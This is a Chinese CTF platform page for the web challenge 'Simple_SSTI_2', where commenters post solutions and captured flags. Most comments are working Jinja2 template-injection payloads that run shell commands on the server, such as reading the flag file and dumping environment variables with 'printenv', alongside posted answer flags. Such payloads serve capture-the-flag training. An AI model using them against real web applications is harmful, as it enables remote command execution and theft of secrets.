Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15924
提  示:
描  述:
Simple_SSTI_2
...
登录回复
评论
smtall 6天前
举报

flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

回复 0
hao7 4月前
举报

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1
超爱西西鸭 7月前
举报

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1
pettter 7月前
举报

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 0
不会写代码的菜鸟 8月前
举报

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 7月前
举报

因为没有import os,os是未定义的

回复 4
q1152874733 8月前
举报

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0
Royic 9月前
举报

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0
sz007 9月前
举报

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0
如你所愿 9月前
举报

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0
109349 10月前
举报

flag{2682096b09e88fe5f1faee731c0d36d7}

回复 0

WriteUp

image
valecalida

5 金币

立即查看

评分(15)

解题动态

288728 攻破了该题 23小时前
看writeup刷题 攻破了该题 1天前
冯123456 攻破了该题 2天前
小城阿扬 攻破了该题 3天前
smtall 攻破了该题 6天前
3028545694 攻破了该题 6天前
15248665739 攻破了该题 7天前
Zzz0529 攻破了该题 8天前
炸鱼饼 攻破了该题 9天前
怀抱晚安 攻破了该题 9天前
tingsi464 攻破了该题 10天前
nina123 攻破了该题 12天前
33538626867 攻破了该题 12天前
qgys 攻破了该题 13天前
19189756057 攻破了该题 15天前
吃个大西瓜 攻破了该题 15天前
wywfzy 攻破了该题 15天前
wangzhuo 攻破了该题 15天前
当心眼睛 攻破了该题 16天前
小手冰凉 攻破了该题 17天前
问题反馈